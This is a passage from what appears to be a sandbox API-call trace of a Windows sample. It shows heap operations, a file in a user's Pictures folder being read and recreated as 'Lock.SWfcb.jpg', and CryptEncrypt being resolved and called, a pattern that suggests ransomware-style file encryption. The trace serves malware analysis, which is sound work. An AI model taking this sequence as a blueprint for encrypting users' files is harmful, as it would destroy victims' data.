lpMsg=0x8cf708) returned 0 [0252.693] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0252.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0252.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0252.694] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0252.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.694] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e558d8 [0252.694] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0252.694] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0252.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0252.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0252.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0252.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0252.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0252.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0252.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.SWfcb.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.swfcb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0252.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0252.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0252.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0252.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0252.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0252.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0252.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0252.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0252.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0252.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0252.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.737] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0252.737] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5e020 [0252.741] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0252.741] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0252.745] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x4f18, lpOverlapped=0x0) returned 1 [0252.746] ReadFile (in: hFile=0x2a0, lpBuffer=0x3be0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0252.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0252.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0252.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2f14010 [0252.748] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5e020 | out: hHeap=0x970000) returned 1 [0252.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0252.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0252.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0252.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0252.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0252.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.752] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0252.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0252.752] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2f28f30 [0252.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0252.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.754] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2f14010 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0252.755] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0252.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0252.756] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0252.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0252.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f08 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2f14010 [0252.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d18 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0252.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54df8 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0252.756] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0252.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0252.757] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51340 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0252.757] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14f18) returned 0x2e7f320 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0252.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0252.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0252.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0252.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0252.762] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.763] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0252.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0252.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0252.763] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.763] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0252.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0252.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0252.764] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0252.764] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0252.764] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.764] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0252.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0252.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0252.764] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.764] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0252.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0252.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0252.764] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0252.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0252.765] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0252.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0252.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0252.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0252.765] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0252.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51ac0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0252.767] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0252.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0252.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0252.767] CryptEncrypt (in: hKey=0xa87050, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x14f18, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x14f20) returned 1 [0252.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0252.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0252.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0252.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0252.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0252.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0252.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0252.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0252.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0252.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0252.768] RtlAllocateHeap (HeapHandle=0x970000, 